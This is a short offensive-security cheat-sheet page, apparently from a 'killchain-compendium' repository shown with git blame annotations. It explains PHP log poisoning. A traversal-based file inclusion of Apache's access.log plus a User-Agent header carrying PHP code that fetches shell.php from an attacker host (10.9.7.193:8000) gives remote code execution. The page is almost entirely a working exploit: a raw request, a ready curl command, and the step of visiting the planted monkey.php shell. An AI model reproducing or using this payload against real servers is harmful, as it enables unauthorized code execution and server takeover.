killchain-compendium/exploit/web/php/php_user_agent_rce.md

# RCE inside HTTP Request
* a.k.a. Log Poisoning
* User Agent can be filled with php code
```sh
GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
Host: 10.10.59.238
User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
[...]
```

* copied from browser as curl command:
```
curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
```
* go to the access log
```sh
10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
```
* Afterwards visit `10.10.211.157/monkey.php`
fuff et al 2021-08-27 00:26:26 +02:00			`# RCE inside HTTP Request`
news 2021-09-01 00:44:36 +02:00			`* a.k.a. Log Poisoning`
fuff et al 2021-08-27 00:26:26 +02:00			`* User Agent can be filled with php code`
			```sh
			`GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1`
			`Host: 10.10.59.238`
			`User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>`
			`[...]`
			```

			`* copied from browser as curl command:`
			```
			`curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"`
			```
			`* go to the access log`
			```sh
			`10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access`
			```
			* Afterwards visit `10.10.211.157/monkey.php`